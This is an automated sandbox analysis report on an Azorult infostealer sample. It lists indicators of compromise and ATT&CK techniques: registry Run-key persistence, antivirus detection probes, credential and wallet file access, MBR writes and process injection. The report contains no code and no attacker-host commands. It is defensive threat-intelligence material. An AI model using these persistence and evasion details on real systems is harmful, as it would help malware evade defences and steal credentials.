azorult | 9adec0a415eb0d5aaa6141173e56500972978eb8aab8d90c558778e27b275023

System Information Discovery

Processes:

6733583.74

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6733583.74
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6733583.74

Drops startup file 1 IoCs

Processes:

6733583.74

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 6733583.74

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	6733583.74

Loads dropped DLL 33 IoCs

Processes:

MsiExec.exefzxqxnyvuvb.tmpIBInstaller_97039.tmpvict.tmpSetup3310.tmpvpn.tmposdeweo1zdf.tmpSetup.tmpProPlugin.tmpapp.exemain.exeDelta.tmpzznote.tmpSetup.exe

pid	process
2716	MsiExec.exe
5092	fzxqxnyvuvb.tmp
5020	IBInstaller_97039.tmp
1960	vict.tmp
4588	Setup3310.tmp
4588	Setup3310.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
4780	vpn.tmp
3696	osdeweo1zdf.tmp
3696	osdeweo1zdf.tmp
3696	osdeweo1zdf.tmp
3696	osdeweo1zdf.tmp
3696	osdeweo1zdf.tmp
3696	osdeweo1zdf.tmp
3696	osdeweo1zdf.tmp
5424	Setup.tmp
5424	Setup.tmp
5464	ProPlugin.tmp
5464	ProPlugin.tmp
5316	app.exe
4392	main.exe
5528	Delta.tmp
5528	Delta.tmp
4944	zznote.tmp
4944	zznote.tmp
4936	Setup.exe
4936	Setup.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\6733583.74	themida
C:\ProgramData\6733583.74	themida
behavioral3/memory/4520-188-0x00000000008C0000-0x00000000008C1000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

gcttt.exe6733583.74osdeweo1zdf.tmpD535R85FV.exemultitimer.exe6606121.72

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\6733583.74"	6733583.74
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\6687755 = "\"C:\\Users\\Admin\\AppData\\Roaming\\oplvxynz1ul\\osdeweo1zdf.exe\" /VERYSILENT"	osdeweo1zdf.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Y4BZCF5OHW2A484 = "\"C:\\Program Files\\D535R85FVP\\D535R85FV.exe\""	D535R85FV.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\rjdfqjhf5qb = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\HJI0WAVTRP\\multitimer.exe\" 1 3.1615157618.604559727ed9a"	multitimer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	6606121.72

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

6733583.74jg4_4jaa.exemd2_2efs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6733583.74
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg4_4jaa.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
63	api.ipify.org
181	ipinfo.io
201	ipinfo.io
433	ipinfo.io
1636	ipinfo.io
3937	ipinfo.io
95	ip-api.com
103	ipinfo.io
106	ipinfo.io
178	checkip.amazonaws.com
207	ipinfo.io
3040	ipinfo.io
21192	checkip.dyndns.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

Processes:

AD754B4D3FE2C4EE.exeSetup.exeAD754B4D3FE2C4EE.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	AD754B4D3FE2C4EE.exe

Drops file in System32 directory 19 IoCs

Processes:

DrvInst.exepowershell.exeDrvInst.exetapinstall.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\SET875D.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\SET875E.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\SET874D.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\SET875D.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\SET875E.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File opened for modification	C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\tap0901.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3884a486-d854-6e4e-b470-f93d3f593067}\SET874D.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

Processes:

Setup.exe6733583.74parse.exeparse.exeparse.exemask_svc.exemask_svc.exe

pid	process
3968	Setup.exe
4520	6733583.74
5344	parse.exe
6496	parse.exe
4548	parse.exe
5344	parse.exe
6496	parse.exe
4548	parse.exe
5344	parse.exe
3816	mask_svc.exe
4960	mask_svc.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

key.exeAD754B4D3FE2C4EE.exeC181.tmp.exe6703882.73Venita.exe

description	pid	process	target process
PID 1288 set thread context of 1604	1288	key.exe	key.exe
PID 2936 set thread context of 2944	2936	AD754B4D3FE2C4EE.exe	firefox.exe
PID 2936 set thread context of 4444	2936	AD754B4D3FE2C4EE.exe	firefox.exe
PID 4200 set thread context of 3460	4200	C181.tmp.exe	C181.tmp.exe
PID 3184 set thread context of 4224	3184	6703882.73	6703882.73
PID 4100 set thread context of 4276	4100	Venita.exe	Venita.exe

Drops file in Program Files directory 64 IoCs

Processes:

vpn.tmpfzxqxnyvuvb.tmpIBInstaller_97039.tmp7za.exeapp.exe6703882.73chashepro3.tmp7za.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-R1KMV.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q4K0P.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-PQA6B.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	fzxqxnyvuvb.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-VKDD7.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-RICAP.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-J3IDT.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-6698A.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Rough-Voice\WinmonProcessMonitor.sys	7za.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-B52CT.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-JKLTD.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-Q00B4.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Rough-Voice\winamp-plugins.7z	app.exe
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-S2CLK.tmp	vpn.tmp
File created	C:\Program Files\D535R85FVP\D535R85FV.exe.config	6703882.73
File created	C:\Program Files (x86)\MaskVPN\is-6MCSC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-LBDNN.tmp	vpn.tmp
File created	C:\Program Files (x86)\JCleaner\is-RIQBJ.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPN.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-AUVBK.tmp	vpn.tmp
File created	C:\Program Files (x86)\Rough-Voice\help.txt	app.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-4QBFN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-QJJ1H.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-IUAOF.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-RI0A2.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-LTNAG.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-IRD61.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-F43ET.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-NDOI1.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\JCleaner\8.exe	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-OH0AG.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-T7DLU.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-87RHQ.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-IA56H.tmp	vpn.tmp
File created	C:\Program Files (x86)\Rough-Voice\WinmonProcessMonitor.sys	7za.exe
File created	C:\Program Files (x86)\Rough-Voice\winamp.7z	app.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-5QQOF.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\JCleaner\unins000.dat	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-6CPKV.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-T44D7.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Rough-Voice\7zxa.dll	app.exe
File created	C:\Program Files (x86)\Rough-Voice\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-0DNPP.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2KBDC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-ICB6R.tmp	vpn.tmp
File created	C:\Program Files (x86)\Rough-Voice\7za.dll	app.exe
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\JCleaner\is-EEKQK.tmp	chashepro3.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-5NFIB.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-E3262.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-3PSIS.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	fzxqxnyvuvb.tmp
File created	C:\Program Files (x86)\Rough-Voice\winamp.exe	7za.exe

Drops file in Windows directory 13 IoCs

Processes:

DrvInst.exeWerFault.exeSetup.tmptapinstall.exeDrvInst.exemultitimer.exesvchost.exe

description	ioc	process
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\is-46LU1.tmp	Setup.tmp
File created	C:\Windows\is-4BH4S.tmp	Setup.tmp
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Microsoft.VisualStudio.Setup.Configuration.Native.dll	Setup.tmp
File opened for modification	C:\Windows\inf\oem2.inf	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5568	4236	WerFault.exe	yyz0xvqotxh.exe
5656	4236	WerFault.exe	yyz0xvqotxh.exe
5764	4236	WerFault.exe	yyz0xvqotxh.exe
5860	4236	WerFault.exe	yyz0xvqotxh.exe
5292	4236	WerFault.exe	yyz0xvqotxh.exe
4832	4236	WerFault.exe	yyz0xvqotxh.exe
6032	4236	WerFault.exe	yyz0xvqotxh.exe
5160	4236	WerFault.exe	yyz0xvqotxh.exe
5016	4236	WerFault.exe	yyz0xvqotxh.exe
4788	4236	WerFault.exe	yyz0xvqotxh.exe
6428	5288	WerFault.exe	lxcqsoxmgsc.exe
4256	5288	WerFault.exe	lxcqsoxmgsc.exe
4800	5288	WerFault.exe	lxcqsoxmgsc.exe
3464	5288	WerFault.exe	lxcqsoxmgsc.exe
2024	5288	WerFault.exe	lxcqsoxmgsc.exe
7912	5288	WerFault.exe	lxcqsoxmgsc.exe
6104	5288	WerFault.exe	lxcqsoxmgsc.exe
6900	5288	WerFault.exe	lxcqsoxmgsc.exe
6864	5288	WerFault.exe	lxcqsoxmgsc.exe
7144	5288	WerFault.exe	lxcqsoxmgsc.exe
5608	9764	WerFault.exe	Fai.com

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

AD754B4D3FE2C4EE.exechrome.exebcdedit.exeAD754B4D3FE2C4EE.exetapinstall.exesvchost.exeDrvInst.exeDrvInst.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	bcdedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	bcdedit.exe
